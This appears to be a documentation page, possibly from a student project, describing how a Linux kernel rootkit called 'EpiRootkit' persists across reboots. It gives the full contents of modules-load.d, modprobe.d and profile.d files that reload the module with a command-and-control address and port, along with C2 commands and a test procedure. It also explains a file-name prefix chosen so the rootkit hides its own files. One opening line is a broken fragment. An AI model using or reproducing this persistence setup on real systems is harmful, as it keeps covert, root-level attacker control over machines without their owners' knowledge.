modules-load.d Method

Modules are

Creates two files:

/etc/modules-load.d/jules_est_bo_system.conf:

  # EpiRootkit module
epirootkit

/etc/modprobe.d/jules_est_bo_modprobe.conf:

  # EpiRootkit module parameters
options epirootkit address=192.168.200.11 port=4444

Shell Profile Method

Creates /etc/profile.d/jules_est_bo_env.sh:

  #!/bin/bash
# System environment initialization
if [ "$(id -u)" -eq 0 ]; then
    # Check if module is already loaded via proc filesystem
    if [ ! -f /sys/kernel/epirootkit/control ] && ! grep -q "^epirootkit " /proc/modules 2>/dev/null; then
        modprobe epirootkit address=192.168.200.11 port=4444 2>/dev/null || insmod /lib/modules/$(uname -r)/extra/epirootkit.ko address=192.168.200.11 port=4444 2>/dev/null
    fi
fi

Commands 

  persist                      # Install both methods
persist_remove               # Remove all
status                       # Check status

Testing 

  sudo insmod epirootkit.ko address=192.168.200.11 port=4444
# Install persistence via C2/WebUI command: persist
sudo reboot
lsmod | grep epirootkit

Status Response 

  {
  "persistence": {
    "enabled": true,
    "methods": {
      "modules_load": {
        "active": true, 
        "files": {
          "modules_load": "/etc/modules-load.d/jules_est_bo_system.conf",
          "modprobe": "/etc/modprobe.d/jules_est_bo_modprobe.conf"
        }
      },
      "shell_profile": {
        "active": true, 
        "path": "/etc/profile.d/jules_est_bo_env.sh"
      }
    }
  }
}

File Naming

  • modules-load.d: Uses jules_est_bo_ prefix for stealth (matches file hiding pattern)
  • modprobe.d: Uses jules_est_bo_ prefix for stealth consistency
  • profile.d: Uses jules_est_bo_ prefix for stealth

Reliable, standards-compliant persistence with consistent stealth naming.

Edit this page